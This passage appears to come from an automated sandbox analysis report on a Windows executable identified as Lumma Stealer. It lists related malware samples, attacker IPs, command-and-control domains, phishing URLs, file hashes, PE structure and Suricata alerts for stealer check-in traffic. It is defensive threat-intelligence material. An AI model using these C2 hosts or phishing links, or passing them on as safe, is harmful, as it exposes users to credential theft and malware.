                                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                                sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                                DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                                N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                deafeninggeh.bizardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                                ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                                hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 45.77.249.79
                                                                                                                                                                                                                                                                he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                steamcommunity.comqth5kdee.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                                LgendPremium.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                                ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                f86nrrc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                                Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106

                                                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                AKAMAI-ASN1EUla.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                • 172.234.241.24
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                https://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 2.16.168.119
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                • 184.51.149.224
                                                                                                                                                                                                                                                                x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                • 23.13.125.21
                                                                                                                                                                                                                                                                QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                • 2.16.158.73
                                                                                                                                                                                                                                                                pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 23.219.82.40
                                                                                                                                                                                                                                                                QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 23.44.203.15
                                                                                                                                                                                                                                                                R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 23.44.203.84
                                                                                                                                                                                                                                                                https://docs.google.com/forms/d/e/1FAIpQLSfpC7xVRv07m89Wl9UZXAneGiWD8iBvaXR4E1UxBoramir5pg/viewform?usp=headerGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 172.233.62.38
                                                                                                                                                                                                                                                                DIGITALOCEAN-ASNUSfile.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                ir_agent.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                                                                                • 157.230.10.115
                                                                                                                                                                                                                                                                https://track.samsupport.jmsend.com/z.z?l=aHR0cHM6Ly9zYW1zdXBwb3J0cy1jb20uam1haWxyb3V0ZS5uZXQveC91P3U9ZWJlNTI4YmMtYTNjMS00NjI0LWFmZjEtYzcwNDJmMjczZWIw&r=14771356625&d=20437066&p=1&t=h&h=40dfe9be3647ce867f619b07dd91c655Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.248.15.35
                                                                                                                                                                                                                                                                arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                • 138.69.143.193
                                                                                                                                                                                                                                                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                • 64.225.24.108
                                                                                                                                                                                                                                                                mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                • 68.183.178.14
                                                                                                                                                                                                                                                                arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                • 134.123.5.235
                                                                                                                                                                                                                                                                arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                • 165.22.66.232
                                                                                                                                                                                                                                                                http://jonotarmot.com/dcs/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 134.209.237.210
                                                                                                                                                                                                                                                                CLOUDFLARENETUShttps://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA%20us-east-2.protection.sophos.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 104.21.49.70
                                                                                                                                                                                                                                                                Laurier Partners Proposal.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                                                Dec 2024_12192924_Image.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 104.21.49.70
                                                                                                                                                                                                                                                                http://senalongley.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.21.96.47
                                                                                                                                                                                                                                                                https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                                                c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.26.12.205
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                • 104.21.23.76
                                                                                                                                                                                                                                                                Executed_Innocap-#81(Final.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.21.11.54
                                                                                                                                                                                                                                                                https://pass-ga.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                                                http://supplytic.ca/chuu/wpia/posha/sf_rand_string_mixed(24)/terence.tinnelly@innocapglobal.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 172.67.215.242

                                                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                hubus.exeGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                mirabon.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                Svcrhpjadgyclc.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                • 178.62.201.34

                                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                No created / dropped files found

                                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Entropy (8bit):7.808597434734726
                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                File name:8ZVMneG.exe
                                                                                                                                                                                                                                                                File size:810'496 bytes
                                                                                                                                                                                                                                                                MD5:e8af4d0d0b47ac68d762b7f288ae8e6e
                                                                                                                                                                                                                                                                SHA1:1d65f31526cc20ab41d6b1625d6674d7f13e326c
                                                                                                                                                                                                                                                                SHA256:b83449768e7af68867c8bc42b19ff012722d88ea66aef69df48661e63e0eb15e
                                                                                                                                                                                                                                                                SHA512:80fad90314ff639f538a72c5e4ca2bf9ae52b9309caa7cd6f87d61791505bb3612b7f3190ab9b67348c5d71f4d29bb9d101e3f66d525eb9b5e2060a10b2d187a
                                                                                                                                                                                                                                                                SSDEEP:24576:grtEhokkSG4bPWQ8C8z3zcB49CNPWQ8C8z3zcB49Cx:grGhokkSG4bPWQv8z3BYNPWQv8z3BYx
                                                                                                                                                                                                                                                                TLSH:00050101B0408177D83B257A59F4EBBA9A3EF8700F7169DB57A81E79CB305C19B31B26
                                                                                                                                                                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....^g.........."......f........................@.......................................@.....................................P..

                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Entrypoint:0x40c312
                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                Subsystem:windows cui
                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                Time Stamp:0x675EBBFA [Sun Dec 15 11:22:34 2024 UTC]
                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                Import Hash:49250672a2ab6e8bdde5f4e329392300

                                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                call 00007FB960CCCB4Ah
                                                                                                                                                                                                                                                                jmp 00007FB960CCC9B9h
                                                                                                                                                                                                                                                                mov ecx, dword ptr [00432840h]
                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                                                mov edi, BB40E64Eh
                                                                                                                                                                                                                                                                mov esi, FFFF0000h
                                                                                                                                                                                                                                                                cmp ecx, edi
                                                                                                                                                                                                                                                                je 00007FB960CCCB46h
                                                                                                                                                                                                                                                                test esi, ecx
                                                                                                                                                                                                                                                                jne 00007FB960CCCB68h
                                                                                                                                                                                                                                                                call 00007FB960CCCB71h
                                                                                                                                                                                                                                                                mov ecx, eax
                                                                                                                                                                                                                                                                cmp ecx, edi
                                                                                                                                                                                                                                                                jne 00007FB960CCCB49h
                                                                                                                                                                                                                                                                mov ecx, BB40E64Fh
                                                                                                                                                                                                                                                                jmp 00007FB960CCCB50h
                                                                                                                                                                                                                                                                test esi, ecx
                                                                                                                                                                                                                                                                jne 00007FB960CCCB4Ch
                                                                                                                                                                                                                                                                or eax, 00004711h
                                                                                                                                                                                                                                                                shl eax, 10h
                                                                                                                                                                                                                                                                or ecx, eax
                                                                                                                                                                                                                                                                mov dword ptr [00432840h], ecx
                                                                                                                                                                                                                                                                not ecx
                                                                                                                                                                                                                                                                pop edi
                                                                                                                                                                                                                                                                mov dword ptr [00432880h], ecx
                                                                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                sub esp, 14h
                                                                                                                                                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                xorps xmm0, xmm0
                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                                                call dword ptr [00430920h]
                                                                                                                                                                                                                                                                mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                                                xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                call dword ptr [004308D4h]
                                                                                                                                                                                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                call dword ptr [004308D0h]
                                                                                                                                                                                                                                                                xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                call dword ptr [00430968h]
                                                                                                                                                                                                                                                                mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                                                lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                                xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                xor eax, ecx
                                                                                                                                                                                                                                                                leave
                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                mov eax, 00004000h
                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                push 00433D60h
                                                                                                                                                                                                                                                                call dword ptr [00430940h]
                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                push 00030000h
                                                                                                                                                                                                                                                                push 00010000h
                                                                                                                                                                                                                                                                push 00000000h
                                                                                                                                                                                                                                                                call 00007FB960CD3882h
                                                                                                                                                                                                                                                                add esp, 0Ch

                                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x306940x50.rdata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000xe8.rsrc
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x380000x1c78.reloc
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x2cb780x18.rdata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x28ff80xc0.rdata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x308600x17c.rdata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                .text0x10000x2646d0x266001cb7d0c9464ff9128ba37efaba3a0910False0.5475111970684039data6.556524326867543IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .rdata0x280000x9bec0x9c00878d385b80bbd700cbb2c5199eea38b8False0.43246694711538464data4.997055879664181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .data0x320000x252c0x1600a99215662023900c738cb0230ba36a9aFalse0.40873579545454547data4.766185881298672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                .CODE0x350000xef40x1000540c3f0f86009f36fac5556f91f62d2aFalse0.498291015625data5.7055594939540075IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .tls0x360000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                .rsrc0x370000xe80x200a6b9bc0f9a7419955ff68c6924c37c42False0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .reloc0x380000x1c780x1e00d59be9c629a3697e2f595ead5e7c7371False0.7571614583333334data6.452492512245182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .bss0x3a0000x486000x486007129d7a296b0c9654e910d00f19fdcffFalse1.0003407005613125data7.999309833911333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                .bss0x830000x486000x486007129d7a296b0c9654e910d00f19fdcffFalse1.0003407005613125data7.999309833911333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                RT_MANIFEST0x370600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222

                                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                ADVAPI32.dllCryptContextAddRef
                                                                                                                                                                                                                                                                KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                                                                                                                USER32.dllDefWindowProcW, GetMessageW, RegisterClassW

                                                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                2024-12-20T07:04:01.704512+01002058212ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click)1192.168.2.6645631.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:02.024946+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.6580221.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:03.018352+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.6580221.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:04.762697+01002058223ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)1192.168.2.649708178.62.201.34443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:04.762697+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649708178.62.201.34443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:04.765168+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)1178.62.201.34443192.168.2.649708TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:05.330048+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649708178.62.201.34443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:05.330048+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649708178.62.201.34443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:05.333755+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.6511101.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:06.343594+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.6511101.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:08.073287+01002058215ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)1192.168.2.649710178.62.201.34443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:08.073287+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710178.62.201.34443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:08.074752+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)1178.62.201.34443192.168.2.649710TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:08.643870+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649710178.62.201.34443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:08.643870+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710178.62.201.34443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:08.719711+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.6598001.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:09.024667+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.6496641.1.1.153UDP
